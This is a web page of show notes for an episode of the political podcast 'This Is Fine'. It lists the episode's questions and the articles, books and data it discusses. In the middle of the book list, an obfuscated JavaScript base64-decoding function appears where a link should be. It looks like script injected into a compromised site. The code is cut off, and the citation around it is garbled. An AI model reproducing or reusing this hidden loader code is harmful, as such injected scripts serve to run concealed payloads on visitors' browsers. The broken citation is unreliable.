Episode 1.1: What the fuck?! This is not fine!
Welcome to This Is Fine, episode 1.1: WTF? This is Not Fine! Thank you very much for listening.
In this week’s podcast, we ask:
How the fuck did that happen? How heroic really were Wright Patman and other segregationist Democrats who fought against corporate power until the changing of the Democratic guard in the 1970s? How did Trump make hate taste so great to so many? And what are our views of the horrific near future and how we might combat it?
Remember: please try to not kill your relatives at Thanksgiving, and please send us reader questions for This is Fine, 1.2: argumentum ad populum, where we say populism out loud a thousand times until it becomes a meaningless collection of syllables.
Articles discussed in this episode:
- Matt Stoller, "How Democrats Kiled Their Populist Soul"
- Rembert Browne, "How Trump Made Hate Intersectional"
Books discussed
- Arlie Hochschild, function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6
and-Mourning-ebook/dp/B01EEQ9BSW/ref=tmm_kin_swatch_0">Strangers in Their Own Land: Anger and Mourning on the American Right - Suzanne Mettler, The Submerged State: How Invisible Government Polices Undermine American Democracy
Data referenced
- Jerry Vinokurov's turnout plots
- Dave Wasserman's (@redistrict) popular vote count
Also mentioned
- Chuck Schumer on the suburban vote:
Richard Hofstadter, "The Paranoid Style in American Politics" and "What Happened to the Anti-trust Movement?"The second article can be found in the published version of The Paranoid Style in American Politics but does not seem to be available on the web.
The "southern manifesto"
The Roosevelt Institute, "leveling the playing field is critical to a party platform"
Emily Crockett, "why misogyny won"
Alex MacGillis's series on Dayton, Ohio
Masha Gessen, "Autocracy: Rules for Survival"